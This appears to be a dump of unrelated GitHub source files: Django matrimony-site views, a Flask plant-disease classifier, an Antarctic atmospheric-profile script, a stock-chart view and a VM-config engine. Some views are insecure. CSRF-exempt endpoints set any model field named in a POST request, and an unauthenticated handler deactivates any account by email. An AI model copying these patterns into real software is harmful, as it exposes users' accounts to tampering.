max_height),\n\t\t\t\t\tsalary__range = (min_salary, max_salary),\n\t\t\t\t\teducation__in = education,\n\t\t\t\t\tcomplexion__in = complexion,\n\t\t\t\t\tmarital_status = married,\n\t\t\t\t)\n\t\t\telse:\n\t\t\t\tget_profiles = Profile.objects.filter(\n\t\t\t\t\tuser__gender = 'F', \n\t\t\t\t\tnakshatra = value, \n\t\t\t\t\tuser__is_active=True,\n\t\t\t\t\tuser__age__range = (min_age, max_age),\n\t\t\t\t\theight__range = (min_height, max_height),\n\t\t\t\t\tsalary__range = (min_salary, max_salary),\n\t\t\t\t\teducation__in = education,\n\t\t\t\t\tcomplexion__in = complexion,\n\t\t\t\t\tmarital_status = married,\n\t\t\t\t)\n\t\t\tlatest_profiles = Profile.objects.filter(user__gender = 'F', user__is_active=True).order_by('-user__date_joined')[:3]\n\t\telse:\n\t\t\tif key == 'rasi':\n\t\t\t\tget_profiles = Profile.objects.filter(\n\t\t\t\t\tuser__gender = 'M', \n\t\t\t\t\trasi = value,\n\t\t\t\t\tuser__is_active=True,\n\t\t\t\t\tuser__age__range = (min_age, max_age),\n\t\t\t\t\theight__range = (min_height, max_height),\n\t\t\t\t\tsalary__range = (min_salary, max_salary),\n\t\t\t\t\teducation__in = education,\n\t\t\t\t\tcomplexion__in = complexion,\n\t\t\t\t\tmarital_status = married,\n\t\t\t\t)\n\t\t\telse:\n\t\t\t\tget_profiles = Profile.objects.filter(\n\t\t\t\t\tuser__gender = 'M', \n\t\t\t\t\tnakshatra = value, \n\t\t\t\t\tuser__is_active=True,\n\t\t\t\t\tuser__age__range = (min_age, max_age),\n\t\t\t\t\theight__range = (min_height, max_height),\n\t\t\t\t\tsalary__range = (min_salary, max_salary),\n\t\t\t\t\teducation__in = education,\n\t\t\t\t\tcomplexion__in = complexion,\n\t\t\t\t\tmarital_status = married,\n\t\t\t\t)\n\t\t\tlatest_profiles = Profile.objects.filter(user__gender = 'M', user__is_active=True).order_by('-user__date_joined')[:3]\n\telse:\n\t\tif profile.user.gender == 'M' :\n\t\t\tif key == 'rasi':\n\t\t\t\tget_profiles = Profile.objects.filter(user__gender = 'F', rasi = value, user__is_active=True)\n\t\t\telse:\n\t\t\t\tget_profiles = Profile.objects.filter(user__gender = 'F', nakshatra = value, user__is_active=True)\n\t\t\tlatest_profiles = Profile.objects.filter(user__gender = 'F', user__is_active=True).order_by('-user__date_joined')[:3]\n\t\telse:\n\t\t\tif key == 'rasi':\n\t\t\t\tget_profiles = Profile.objects.filter(user__gender = 'M', rasi = value, user__is_active=True)\n\t\t\telse:\n\t\t\t\tget_profiles = Profile.objects.filter(user__gender = 'M', nakshatra = value, user__is_active=True)\n\t\t\tlatest_profiles = Profile.objects.filter(user__gender = 'M', user__is_active=True).order_by('-user__date_joined')[:3]\n\t\tcomplexion = ''\n\t\teducation = ''\n\tpage = request.GET.get('page', 1)\n\tpaginator = Paginator(get_profiles, 10)\n\ttry:\n\t\tshow_profiles = paginator.page(page)\n\texcept PageNotAnInteger:\n\t\tshow_profiles = paginator.page(1)\n\texcept EmptyPage:\n\t\tshow_profiles = paginator.page(paginator.num_pages)\n\tcontext = {\n\t\t'profile' : profile,\n\t\t'profile_image' : profile_image,\n\t\t'show_profiles' : show_profiles,\n\t\t'latest_profiles' : latest_profiles,\n\t\t'preference' : preference,\n\t\t'education' : education,\n\t\t'complexion' : complexion\n\t}\n\treturn render(request, 'mainApp/sort_by.html', context )\n\ndef manage_profile(request):\n\tcontext = {}\n\tif request.POST:\n\t\tuser = Profile.objects.get(user__email = request.user)\n\t\ttry:\n\t\t\tprofile = ProfileImage.objects.get(profile = user)\n\t\t\tif bool(request.FILES.get('profile_image', False)) == True:\n\t\t\t\tprofile.file = request.FILES['profile_image']\n\t\t\t\tprofile.save()\n\t\texcept 
ProfileImage.DoesNotExist:\n\t\t\tprofile = ProfileImage.objects.create(profile=user, file=request.FILES['profile_image'])\n\t\t\tprofile.save()\n\t\tif bool(request.FILES.get('horoscope', False)) == True:\n\t\t\tuser.horoscope = request.FILES['horoscope']\n\t\t\tuser.save()\n\t\treturn redirect('manage_profile')\n\t\n\tprofile = Profile.objects.get(user=request.user)\n\ttry:\n\t\tprofile_image = ProfileImage.objects.get(profile=profile)\n\texcept ProfileImage.DoesNotExist:\n\t\tprofile_image = ''\n\tcontext = {\n\t\t'profile' : profile,\n\t\t'profile_image' : profile_image,\n\t}\n\treturn render(request, 'mainApp/manage_profile.html', context )\n\n\n@csrf_exempt\ndef ajax_profile_update(request):\n\taccount = ['name', 'dob', 'age',]\n\tresponse = \"\"\n\tif request.POST:\n\t\tdata = request.POST\n\t\tif data['field'] in account:\n\t\t\tobj = Account.objects.get(email = request.user.email)\n\t\t\tsetattr(obj, data['field'], data['new_data'])\n\t\t\ttry:\n\t\t\t\tobj.save()\n\t\t\t\tprint(\"done\")\n\t\t\t\tresponse = 'success'\n\t\t\texcept:\n\t\t\t\tresponse = 'error'\n\t\t\t\treturn HttpResponse(response)\n\t\telse:\n\t\t\tobj = Profile.objects.get(user = request.user)\n\t\t\tsetattr(obj, data['field'], data['new_data'])\n\t\t\ttry:\n\t\t\t\tobj.save()\n\t\t\t\tprint(\"done\")\n\t\t\t\tresponse = 'success'\n\t\t\texcept:\n\t\t\t\tresponse = 'error'\n\t\t\t\treturn HttpResponse(response)\n\n\t\treturn HttpResponse(response)\n@csrf_exempt\ndef ajax_profile_pic_update(request):\n\tif request.POST:\n\t\tprint(\"done\")\n\t\tuser = Profile.objects.get(user__email = request.user)\n\t\tprofile = ProfileImage.objects.get(profile = user)\n\t\tprofile.file = request.FILES['profile_image']\n\t\tprofile.save()\n\t\treturn redirect('manage_profile')#HttpResponse(response)\n\treturn redirect('manage_profile')\n\ndef deactivate_user(request):\n    if request.POST:\n        email = request.POST['user']\n        reason = request.POST['reason']\n        user = Account.objects.get(email=email)\n        user.is_active = False\n        user.reason = reason\n        user.save()\n        return redirect('home')\n\ndef view_profile(request, id):\n\tview_profile = Profile.objects.get(user__id = id)\n\ttry:\n\t\tview_profile_image = ProfileImage.objects.get(profile=view_profile)\n\texcept ProfileImage.DoesNotExist:\n\t\tview_profile_image = ''\n\ttry:\n\t\tprofile_image = ProfileImage.objects.get(profile__user=request.user)\n\texcept ProfileImage.DoesNotExist:\n\t\tprofile_image = ''\n\tcontext = {\n\t\t'view_profile' : view_profile,\n\t\t'view_profile_image' : view_profile_image,\n\t\t'profile_image' : profile_image,\n\n\t}\n\treturn render(request, 'mainApp/view_profile.html', context)\n\ndef change_password(request):\n\tsystem_messages = messages.get_messages(request)\n\tfor message in system_messages:\n\t\tpass\n\tsystem_messages.used = True\n\tview_profile = Profile.objects.get(user=request.user)\n\ttry:\n\t\tprofile_image = ProfileImage.objects.get(profile=view_profile)\n\texcept ProfileImage.DoesNotExist:\n\t\tprofile_image = ''\n\tcontext = {}\n\tif request.method == 'POST':\n\t\tform = PasswordChangeForm(request.user, request.POST)\n\t\tif request.POST['old_password'] == request.POST['new_password1']:\n\t\t\tmessages.error(request, 'Old password and new password cannot be same', extra_tags=\"notification is-danger\")\n\t\telif form.is_valid():\n\t\t\tuser = form.save()\n\t\t\tupdate_session_auth_hash(request, user) # Important!\n\t\t\tmessages.success(request, 'Your password was successfully updated!', extra_tags=\"notification 
is-success\")\n\t\t\tcontext = {\n\t\t\t\t'form' : form,\n\t\t\t\t'profile_image' : profile_image,\n\t\t\t}\n\t\t\treturn render(request, 'mainApp/change_password.html', context)\n\t\telse:\n\t\t\tmessages.error(request, 'Please correct the error below.', extra_tags=\"notification is-danger\")\n\telse:\n\t\tform = PasswordChangeForm(request.user)\n\tcontext = {\n\t\t'form' : form,\n\t\t'profile_image' : profile_image,\n\t}\n\treturn render(request, 'mainApp/change_password.html', context)\n\ndef update_preference(request):\n\tprofile = Profile.objects.get(user = request.user)\n\tif request.POST:\n\t\ttry:\n\t\t\tpreference = Preference.objects.get(profile=profile)\n\t\t\tprint(\n\t\t\t\tpreference.age,\n\t\t\t\tpreference.height,\n\t\t\t\tpreference.salary,\n\t\t\t\tpreference.education,\n\t\t\t\tpreference.complexion,\n\t\t\t\tpreference.married\n\t\t\t)\n\t\texcept Preference.DoesNotExist:\n\t\t\tpreference = False\n\t\tif preference:\n\t\t\tpreference.age = request.POST['age']\n\t\t\tpreference.height = request.POST['height']\n\t\t\tpreference.salary = request.POST['salary']\n\t\t\tpreference.education = request.POST['education']\n\t\t\tpreference.complexion = request.POST['complexion']\n\t\t\tpreference.married = request.POST['married']\n\t\t\tpreference.save()\n\t\telse:\n\t\t\tpreference = Preference.objects.create(\n\t\t\t\tprofile=profile,\n\t\t\t\tage=request.POST['age'],\n\t\t\t\theight=request.POST['height'],\n\t\t\t\tsalary=request.POST['salary'],\n\t\t\t\teducation=request.POST['education'],\n\t\t\t\tcomplexion=request.POST['complexion'],\n\t\t\t\tmarried=request.POST['married'],\n\t\t\t)\n\t\t\tpreference.save()\n\t\treturn HttpResponse('success')\n\telif request.method == 'GET' :\n\t\tpreference = Preference.objects.get(profile=profile)\n\t\tpreference.delete()\n\t\treturn HttpResponse('Success')\n\n","repo_name":"jayantamadhav/tamilnaduyadava","sub_path":"mainApp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":14537,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"32862185040","text":"from flask import Flask, render_template, request\r\nimport keras\r\nfrom PIL import Image\r\nimport numpy as np\r\nimport json\r\n\r\napp= Flask(__name__)\r\n\r\n@app.route(\"/\", methods= [\"GET\",\"POST\"])\r\ndef hello():\r\n final_model2 = keras.models.load_model('D:/FinalYearProject/CLD Prediction WebApp/Model/Cassava_best_modelEffNetB3v3.h5')\r\n predictions = []\r\n IMG_SIZE = 380\r\n IMG_SIZE1 = 300\r\n # size = (IMG_SIZE,IMG_SIZE)\r\n size1= (IMG_SIZE1,IMG_SIZE1)\r\n #for image in test_images:\r\n if request.method == \"POST\":\r\n file = request.files['file']\r\n path = file.filename\r\n img1 = Image.open('C:/Users/arulk/OneDrive/Desktop/TestImages/' + path)\r\n img1 = img1.resize(size1)\r\n img1 = np.expand_dims(img1, axis=0)\r\n prediction2 = final_model2.predict(img1)\r\n predictions.extend(prediction2.argmax(axis = 1))\r\n f = open(\"D:/FinalYearProject/CassavaLeafDisase/cassava-leaf-disease-classification-source/label_num_to_disease_map.json\")\r\n data = json.load(f)\r\n val = data[\"{}\".format(predictions[0])]\r\n location = 'D:/FinalYearProject/CassavaLeafDisase/cassava-leaf-disease-classification-source/train_images/' + path\r\n return render_template(\"result.html\", msg=val ,imgg=location)\r\n return render_template(\"home.html\")\r\n\r\n@app.route('/')\r\ndef html_page(page_name):\r\n return render_template(page_name)\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n app.run(debug=True)","repo_name":"Ragul-Arulanandam/CLDWebapp","sub_path":"CLD-PredictionWebApp/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"28016020849","text":"import datetime as dt\nimport bisect\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom os.path import exists\n\n# import copy\n\n\n# My modules\nfrom antarc.get_atm_profs_rsrc import get_files, FileInfo, Sonde, Era, Prof\nfrom antarc.get_atm_profs_rsrc import get_co2, CO2stationData, CarbonTracker\n\n\ndef get_atm_profs(atm_prof_params, esc_params, esc_case, redo: bool = True):\n \"\"\"\n Get atmospheric profiles from sonde data, as well as ERA5, carbon tracker\n and surface co2 measurements, using imported parameters\n \"\"\"\n start_date = esc_case.DATE1\n end_date = esc_case.DATE2\n\n lat = esc_params.LATITUDE\n lon = esc_params.LONGITUDE\n # alt_surf = esc_params.ALTITUDE\n # location = esc_params.LOCATION\n layerbnds_in = atm_prof_params.LAYERBNDS\n model_extra = atm_prof_params.MODEL_EXTRA\n sonde_dir = atm_prof_params.SONDE_DIR\n sonde_filefmt = atm_prof_params.SONDE_FILEFORMAT\n era_dir = atm_prof_params.ERA_DIR\n era_fileformat = atm_prof_params.ERA_FILEFORMAT\n co2_dir = atm_prof_params.CO2_DIR\n co2_file_drake = atm_prof_params.CO2_FILE_PALMER\n co2_file_palmer = atm_prof_params.CO2_FILE_DRAKE\n ct_filefmt = atm_prof_params.CT_FILEFORMAT\n out_dir = atm_prof_params.OUT_DIR\n fig_dir = atm_prof_params.FIG_DIR\n\n # Flags. The created profiles are always saved. These flags set whether to\n # also plot and save figures and pickled results.\n plotfigs = True # Flag specifiying whether to plot and save figures\n\n # # # # # # # START MAIN CODE # # # # # # #\n\n # Pad out dates by a few days\n start_date = dt.datetime(\n start_date.year,\n start_date.month,\n start_date.day - 2,\n tzinfo=dt.timezone.utc,\n )\n end_date = dt.datetime(\n end_date.year,\n end_date.month,\n end_date.day + 1,\n tzinfo=dt.timezone.utc,\n )\n\n # Get filenames\n sonde_file_n_dates = get_files(sonde_dir, sonde_filefmt)\n eraFiles = FileInfo(era_dir, era_fileformat)\n\n ctFiles = FileInfo(co2_dir, ct_filefmt) # , 23, 33, \"%Y-%m-%d\")\n # surfmetFiles = FileInfo(surfmet_dir, surfmet_file, 12, 20, '%Y%m%d')\n\n # Get CO2 concentrations at stations\n co2_drake = CO2stationData(co2_file_drake)\n co2_palmer = CO2stationData(co2_file_palmer)\n\n # Chop dates down to desired range\n start_ord = dt.datetime.toordinal(start_date)\n end_ord = dt.datetime.toordinal(end_date)\n ndates = len(sonde_file_n_dates)\n ords = [\n dt.datetime.toordinal(sonde_file_n_dates[i][1]) for i in range(ndates)\n ]\n\n # QC date range of sondes\n if start_ord < ords[0] or end_ord > ords[-1]:\n raise ValueError(\"sondes missing for the desired date range\")\n\n # Get indices for date range\n ibeg = max(bisect.bisect_right(ords, start_ord) - 1, 0)\n iend = bisect.bisect_left(ords, end_ord) # ords.index(end_ord)\n\n # Loop over radiosounding files, set profile, and save as netcdf file\n for sonde_file, sonde_date in sonde_file_n_dates[ibeg : iend + 1]:\n # If the file exists, do not recreate it unless redo set to False\n if not redo and exists(sonde_dir + sonde_file):\n continue\n\n print(\"Working on\", sonde_file)\n sonde = Sonde(sonde_dir, sonde_file, sonde_date)\n sonde.quality_control()\n\n # Use the lowest sonde height as the surface height\n layerbnds = np.array(layerbnds_in)\n layerbnds[layerbnds < 1] += sonde.z[0] # km\n\n # If the CT data ends a while before the desired date, try one year before\n date_for_ct = sonde_date\n lastdate = ctFiles.dates[-1]\n if date_for_ct < ctFiles.dates[0]:\n raise ValueError(\"No useable CarbonTracker data found.\")\n\n while date_for_ct > lastdate and 
(date_for_ct - lastdate).days > 30:\n            if date_for_ct < ctFiles.dates[0]:\n                raise ValueError(\"No useable CarbonTracker data found.\")\n            date_for_ct = dt.datetime(\n                date_for_ct.year - 1,\n                date_for_ct.month,\n                date_for_ct.day,\n                date_for_ct.hour,\n            )\n        # Get the nearest date\n        # ddate = [x - date_for_ct for x in ctFiles.dates]\n        # idate = np.argmin(np.abs(ddate))\n\n        ctracker = CarbonTracker(ctFiles, date_for_ct, lat, lon)\n        co2_surf = get_co2(sonde.date, lat, co2_drake, co2_palmer)\n\n        era = Era(eraFiles, era_fileformat, sonde.date, lat, lon)\n        era.tack_on_60km(ctracker)  # Set values at 60 km, for interping\n\n        prof = Prof(sonde, layerbnds)  # P, T, RH from sonde\n        prof.set_n_scale(\"co2\", ctracker, co2_surf)  # CO2 from flask measmnts\n        prof.set(\"o3\", era)  # Ozone from ERA\n        prof.set_upper(\"T\", era)  # Upper T from ERA\n        prof.set_upper(\"T\", ctracker)  # Upmost T from carbonTracker\n        prof.set_upper_spline(\"P\", era)  # Upper P from ERA-Interim\n        prof.h2o[prof.z >= 11.5] = 4.0  # Upmost H2o = 4 ppm\n        # if plotfigs:\n        #     profo = copy.deepcopy(prof)  # For plotting figures\n        # prof.set_surf_T(surfmetFiles, sonde.date)  # Set surface temperatures\n        prof.model_extra = model_extra  # model for other molecs\n\n        prof.error_check(era)  # Check for Nans, z, P\n\n        # Save the output as netcdf file (%H%M: hour and minute)\n        fname = out_dir + \"prof\" + prof.date.strftime(\"%Y%m%d_%H%M\")\n        prof.write_to_netcdf_file(fname + \".nc\")\n\n        # If specified, plot the results\n        if plotfigs:\n            # zmet, Tmet = get_surface_T(surfmetFiles, sonde.date)\n\n            # .. Make figures showing results\n            ylim = [-5, 65]\n\n            plt.figure(0)\n            plt.clf()\n            plt.subplot(221)\n            plt.cla()\n            plt.plot(era.T, era.z, \".-\", label=\"ERA\")\n            # plt.plot(ctracker.T, ctracker.z, \"o-\", label=\"Carbon Tracker\")\n            plt.plot(\n                sonde.T,\n                sonde.z,\n                linewidth=4,\n                color=[0.6, 0.6, 0.6],\n                label=\"sonde\",\n            )\n            plt.plot(prof.T, prof.z, \"k.-\", label=\"Profile\")\n            # plt.plot(profo.T, profo.z, 'k.-', label = 'Profile before srf T')\n            # plt.plot(Tmet, zmet, 'g*' )\n            # plt.legend();\n            plt.ylim(ylim)\n            plt.xlabel(\"Temperature (K)\")\n            plt.title(sonde_date)\n\n            plt.subplot(222)\n            plt.cla()\n            plt.plot(era.P, era.z, \".-\", label=\"ERA\")\n            # plt.plot(ctracker.P, ctracker.zbnd, \"o-\", label=\"Carbon Tracker\")\n            plt.plot(\n                sonde.P,\n                sonde.z,\n                linewidth=4,\n                color=[0.6, 0.6, 0.6],\n                label=\"sonde\",\n            )\n            plt.plot(prof.P, prof.z, \"k\", label=\"Profile\")\n            plt.legend()\n            plt.ylim(ylim)\n            plt.xlabel(\"Pressure (mb)\")\n\n            plt.subplot(223)\n            plt.cla()\n            plt.plot(era.rh, era.z, \".-\", label=\"ERA\")\n            plt.plot(\n                sonde.rh,\n                sonde.z,\n                linewidth=4,\n                color=[0.6, 0.6, 0.6],\n                label=\"sonde\",\n            )\n            plt.plot(prof.rh, prof.z, \"k\", label=\"Profile\")\n            plt.legend()\n            plt.ylim(ylim)\n            plt.xlabel(\"Relative Humidity (%)\")\n\n            plt.subplot(224)\n            plt.cla()\n            # plt.plot(ctracker.co2, ctracker.z, \".-\", label=\"Carbon Tracker\")\n            plt.plot(prof.co2, prof.z, \"k\", label=\"Profile\")\n            plt.legend()\n            plt.ylim(ylim)\n            plt.xlabel(\"CO2 (ppm)\")\n\n            figname = \"prof\" + prof.date.strftime(\"%Y%m%d_%H%M\") + \".png\"\n            plt.pause(0.1)\n            plt.savefig(fig_dir + figname)\n\n            plt.figure(1)\n            plt.clf()\n            plt.plot(np.diff(prof.T), prof.z[:-1] + np.diff(prof.z) / 2, \".-\")\n            plt.title(sonde_date)\n            plt.xlabel(\"$\\Delta$Temperature (K)\")\n\n            figname = \"dT\" + prof.date.strftime(\"%Y%m%d_%H%M\") + \".png\"\n            plt.pause(0.1)\n            plt.savefig(fig_dir + figname)\n\n            plt.figure(2)\n            plt.clf()\n            plt.plot(era.T, era.z, \".-\", label=\"ERA\")\n            # plt.plot(ctracker.T, ctracker.z, \"o-\", label=\"Carbon 
Tracker\")\n plt.plot(\n sonde.T,\n sonde.z,\n linewidth=4,\n color=[0.6, 0.6, 0.6],\n label=\"sonde\",\n )\n # plt.plot(profo.T, profo.z, '-', label = 'Profile before surf T')\n plt.plot(prof.T, prof.z, \"k.-\", label=\"Profile\")\n # plt.plot(Tmet, zmet, 'g*', label = 'Surface data')\n plt.legend()\n plt.ylim(ylim)\n plt.xlabel(\"Temperature (K)\")\n maxT = np.max(\n [np.max(era.T[era.z < 1.4]), np.max(sonde.T[sonde.z < 1.4])]\n )\n xmin = np.floor(np.min(prof.T[prof.z < 1.4] - 2))\n plt.axis([xmin, np.ceil(maxT) + 2, -0.2, 1.4])\n\n figname = \"Tlow\" + prof.date.strftime(\"%Y%m%d_%H%m\") + \".png\"\n plt.pause(1)\n plt.savefig(fig_dir + figname)\n","repo_name":"prowe12/antarctic-peninsula","sub_path":"antarc/escudero/case202205/get_atm_profs.py","file_name":"get_atm_profs.py","file_ext":"py","file_size_in_byte":9123,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"17661355499","text":"from django.shortcuts import render\nimport yfinance as yf\nimport matplotlib.pyplot as plt\nimport matplotlib.dates as mdates\nfrom io import BytesIO\nimport base64\nfrom stockapp import utils\n\ndef index(request):\n plot_url = None\n if request.method == 'POST':\n symbol = request.POST.get('symbol')\n start_date,start_date_num = utils.getSpecificDate(num_days_ago=366)\n end_date,end_date_num = utils.getSpecificDate(num_days_ago=1)\n stock_data = yf.download(symbol, start=start_date, end=end_date)\n # Define the date format\n date_fmt = '%Y-%m-%d' # e.g., 2023-09-22\n date_formatter = mdates.DateFormatter(date_fmt)\n # Get current axis and set the formatter\n plt.figure(figsize=(10,5))\n plt.xlim(start_date_num,end_date_num)\n plt.xticks(rotation=45)\n ax = plt.gca()\n ax.xaxis.set_major_formatter(date_formatter)\n ax.xaxis.set_major_locator(mdates.MonthLocator()) \n plt.plot(stock_data['Close'], label='Close Price')\n xtick_locs = ax.get_xticks()\n ymin,ymax = ax.get_ylim()\n plt.vlines(x=xtick_locs,ymin=ymin,ymax=ymax, color='#D3D3D3', linestyles='dashed', alpha=0.5)\n plt.title(f'{symbol} Close Price')\n plt.xlabel('Date')\n plt.ylabel('Close Price (USD)')\n plt.legend(loc='upper left')\n plt.tight_layout()\n\n img = BytesIO()\n plt.savefig(img, format='png')\n img.seek(0)\n plot_url = base64.b64encode(img.getvalue()).decode()\n\n return render(request, 'stockapp/index.html', {'plot_url': plot_url})\n","repo_name":"jaycherd/Stock","sub_path":"stockapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1589,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"11673146434","text":"import sys\nsys.path.append(\"/usr/lib/python2.6/site-packages\")\nimport hashlib\nimport time\nfrom cloudbot.interface.ttypes import *\nfrom cloudbot.utils import utility\nimport vmConfigEngine\nimport copy\nimport vmEngineUtility\n\nlogger = utility.init_log()\n\n\n# change the image ,update the clc global clientData \n#p_change_image_update_client_data\ndef p_update_clientdata_by_image(newImage,clientDataList):\n for userName in clientDataList.keys():\n if clientDataList[userName].has_key('remote'):\n clientDatas = clientDataList[userName]['remote']\n for clientData in clientDatas:\n if clientData.image_id == newImage.imageId:\n clientData.os_type = newImage.OS\n clientData.platform = newImage.platform\n clientData.image_category = newImage.imageCategory\n clientData.image_name = newImage.name \n \n if clientDataList[userName].has_key('local'):\n for nodeIp in clientDataList[userName]['local'].keys():\n clientDatas = clientDataList[userName]['local'][nodeIp]\n for clientData in clientDatas:\n if clientData.image_id == newImage.imageId:\n clientData.os_type = newImage.OS\n clientData.platform = newImage.platform\n clientData.image_category = newImage.imageCategory\n clientData.image_name = newImage.name \n return\n\n# change the image ,update the clc global instance info\n#old p_change_image_update_instances\ndef p_update_instances_by_image(newImage,instanceList):\n for cluster in instanceList.keys():\n for nodeIp in instanceList[cluster].keys():\n clientDatas = instanceList[cluster][nodeIp]\n for clientData in clientDatas:\n if clientData.image_id == newImage.imageId:\n clientData.os_type = newImage.OS\n clientData.platform = newImage.platform\n clientData.image_category = newImage.imageCategory\n clientData.image_name = newImage.name\n \n return\n\n# add vmconfig ,update the clc global clientData info and global instance info \ndef add_vmconfig(vmconfig,images,users,nodeList,clientDataList): \n for userInfo in users:\n # get user lmage list\n for img in images:\n clientInfo = thd_client_info()\n clientInfo.image_id = img.imageId\n clientInfo.image_name = img.name\n clientInfo.user = userInfo.userName\n clientInfo.vmconfig_id = vmconfig.id\n clientInfo.client_data_id = vmEngineUtility.create_clientdata_id(userInfo.userName,img.imageId)\n clientInfo.is_assign_node = vmconfig.is_assign_node\n if vmconfig.is_assign_node:\n clientInfo.node_ip = vmconfig.node_ip\n else:\n clientInfo.node_ip = 'any'\n if vmconfig.thermophoresis!=None: \n clientInfo.thermophoresis=copy.deepcopy(vmconfig.thermophoresis)\n if vmconfig.net_info!=None: \n clientInfo.net_info = copy.deepcopy(vmconfig.net_info)\n if vmconfig.run_schedule!=None:\n clientInfo.run_schedule = copy.deepcopy(vmconfig.run_schedule)\n if vmconfig.vm_info!=None:\n clientInfo.vm_info = copy.deepcopy(vmconfig.vm_info)\n if not vmconfig.is_assign_node:\n clientInfo.vm_info.is_run_without_copy = True\n if vmconfig.vm_info.machine_name==None:\n clientInfo.vm_info.machine_name = img.name\n if vmconfig.snapshot!=None:\n clientInfo.snapshot = copy.deepcopy(vmconfig.snapshot)\n if vmconfig.peripheral!=None:\n clientInfo.peripheral = copy.deepcopy(vmconfig.peripheral)\n instanceState= thd_instance_state()\n instanceState.instance_type= img.imageType\n instanceState.is_can_run = True\n instanceState.download_progress = -1\n instanceState.state = thd_TRANSACT_STATE.TERMINATED\n instanceState.is_local = False\n if vmconfig.is_assign_node:\n nodeInfo = vmEngineUtility.get_nodeinfo(vmconfig.node_ip,nodeList)\n if 
nodeInfo!=None and nodeInfo.isLocal!=None and nodeInfo.isLocal: \n instanceState.is_local = True \n clientInfo.instance_state = instanceState\n clientInfo.os_type = img.OS\n clientInfo.platform = img.platform\n clientInfo.image_category = img.imageCategory\n clientInfo.image_size = img.size\n clientInfo.user_department_id = vmconfig.user_department_id\n logger.debug('the clientInfo: %s' %str(clientInfo))\n vmEngineUtility.add_clientinfo_to_dictionary(clientInfo,clientDataList)\n \n logger.debug('init_client_info :%s' %str(clientDataList))\n return\n\n#old: p_update_clientinfo_from_vmconfig\ndef p_update_clientinfo_by_vmconfig(clientInfo,newVmConfig): \n clientInfo.is_assign_node = newVmConfig.is_assign_node\n if newVmConfig.is_assign_node:\n clientInfo.node_ip = newVmConfig.node_ip\n else:\n clientInfo.node_ip = 'any'\n if newVmConfig.thermophoresis!=None:\n clientInfo.thermophoresis=copy.deepcopy(newVmConfig.thermophoresis)\n if newVmConfig.net_info!=None:\n clientInfo.net_info = copy.deepcopy(newVmConfig.net_info) \n if newVmConfig.run_schedule!=None:\n clientInfo.run_schedule = copy.deepcopy(newVmConfig.run_schedule) \n if newVmConfig.vm_info!=None:\n vmInfo = copy.deepcopy(newVmConfig.vm_info)\n if newVmConfig.vm_info.machine_name==None: \n vmInfo.machine_name = clientInfo.vm_info.name\n if not newVmConfig.is_assign_node:\n vmInfo.is_run_without_copy = True\n clientInfo.vm_info = vmInfo\n if newVmConfig.snapshot!=None:\n clientInfo.snapshot = copy.deepcopy(newVmConfig.snapshot) \n if newVmConfig.peripheral!=None:\n clientInfo.peripheral = copy.deepcopy(newVmConfig.peripheral) \n return\n\n# add the image ,update the clc global clientData info and global instance info\ndef add_image(newImage,clientDataList):\n return\n\n# change the image ,update the clc global clientData info and global instance info\ndef change_image(newImage,clientDataList,instanceList):\n p_update_clientdata_by_image(newImage,clientDataList)\n p_update_instances_by_image(newImage,instanceList)\n \ndef delete_image(imageId,clientDataList):\n for userName in clientDataList.keys(): \n # delete remote node clientdata about image\n if clientDataList[userName].has_key('remote'):\n clientInfoList = clientDataList[userName]['remote'][:]\n for clientInfo in clientInfoList:\n if clientInfo.image_id==imageId:\n if not vmConfigEngine.g_user_thread_lock.has_key(userName):\n vmConfigEngine.g_user_thread_lock[userName]=threading.Lock() \n vmConfigEngine.g_user_thread_lock[userName].acquire()\n clientDataList[userName]['remote'].remove(clientInfo)\n vmConfigEngine.g_user_thread_lock[userName].release()\n #delete local node clientdata about image \n if clientDataList[userName].has_key('local'):\n clientDataLocalList = clientDataList[userName]['local']\n for nodeIp in clientDataLocalList.keys():\n clientInfoList = clientDataLocalList[nodeIp][:]\n for clientInfo in clientInfoList:\n if clientInfo.image_id==imageId:\n if not vmConfigEngine.g_user_thread_lock.has_key(userName):\n vmConfigEngine.g_user_thread_lock[userName]=threading.Lock()\n vmConfigEngine.g_user_thread_lock[userName].acquire()\n clientDataList[userName]['local'][nodeIp].remove(clientInfo)\n vmConfigEngine.g_user_thread_lock[userName].release() \n return \n \n# change vmconfig ,update the clc global clientData info and global instance info\ndef change_vmconfig(newVmConfig,images,nodeList,users,clientDataList):\n for userInfo in users:\n if clientDataList.has_key(userInfo.userName):\n #vmconfig assigned node is local node\n if 
clientDataList[userInfo.userName].has_key('local'):\n for nodeIp in clientDataList[userInfo.userName]['local'].keys():\n clientInfoList = clientDataList[userInfo.userName]['local'][nodeIp]\n for clientInfo in clientInfoList:\n if clientInfo.vmconfig_id==newVmConfig.id:\n vmConfigEngine.g_user_thread_lock[userInfo.userName].acquire()\n clientDataList[userInfo.userName]['local'][nodeIp].remove(clientInfo)\n vmConfigEngine.g_user_thread_lock[userInfo.userName].release() \n #vmconfig assigned node is remote node\n if clientDataList[userInfo.userName].has_key('remote'):\n clientInfoList = clientDataList[userInfo.userName]['remote']\n for clientInfo in clientInfoList:\n if clientInfo.vmconfig_id==newVmConfig.id:\n vmConfigEngine.g_user_thread_lock[userInfo.userName].acquire()\n clientDataList[userInfo.userName]['remote'].remove(clientInfo)\n vmConfigEngine.g_user_thread_lock[userInfo.userName].release()\n \n add_vmconfig(newVmConfig,images,users,nodeList,clientDataList)\n return \n \ndef delete_vmconfig(vmconfigId,clientDataList):\n return\n\n\ndef add_user(user,vmconfig,clientDataList):\n \n return\n\ndef delete_user(user,clientDataList):\n if clientDataList.has_key(user):\n if not vmConfigEngine.g_user_thread_lock.has_key(user):\n vmConfigEngine.g_user_thread_lock[user]=threading.Lock()\n vmConfigEngine.g_user_thread_lock[user].acquire()\n clientDataList.pop(user)\n vmConfigEngine.g_user_thread_lock[user].release() \n 